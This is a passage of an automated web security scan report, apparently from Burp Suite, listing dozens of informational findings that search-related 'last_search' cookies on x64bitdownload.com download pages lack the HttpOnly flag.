6.21. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A32%3A%22ext2fs-ext3fs-paragon-extbrowser%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A32%3A%22ext2fs+ext3fs+paragon+extbrowser%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.22. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-fast-download-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.23. http://www.x64bitdownload.com/64-bit-feed-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feed-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.24. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feedreader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.25. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-grabber-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.26. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-sharing-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.27. http://www.x64bitdownload.com/64-bit-firefox-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-firefox-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.28. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.29. http://www.x64bitdownload.com/64-bit-forum-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.30. http://www.x64bitdownload.com/64-bit-forums-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forums-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.31. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-google-groups-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22google-groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22google+groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.32. http://www.x64bitdownload.com/64-bit-grabber-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-grabber-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.33. http://www.x64bitdownload.com/64-bit-group-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-group-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.34. http://www.x64bitdownload.com/64-bit-groups-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-groups-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.35. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-highspeed-connection-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.36. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-image-grabber-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.37. http://www.x64bitdownload.com/64-bit-images-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-images-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.38. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.39. http://www.x64bitdownload.com/64-bit-internet-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.40. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-kill-file-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22kill-file%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22kill+file%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.41. http://www.x64bitdownload.com/64-bit-killfile-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-killfile-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.42. http://www.x64bitdownload.com/64-bit-mp3-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-mp3-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.43. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multimedia-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.44. http://www.x64bitdownload.com/64-bit-multipart-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multipart-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.45. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.46. http://www.x64bitdownload.com/64-bit-news-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.47. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-reader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.48. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsfeed-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.49. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.50. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.51. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.52. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.53. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.54. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.55. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.56. http://www.x64bitdownload.com/64-bit-nntp-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.57. http://www.x64bitdownload.com/64-bit-nzb-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nzb-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.58. http://www.x64bitdownload.com/64-bit-ozum-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ozum-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.59. http://www.x64bitdownload.com/64-bit-par-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-par-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

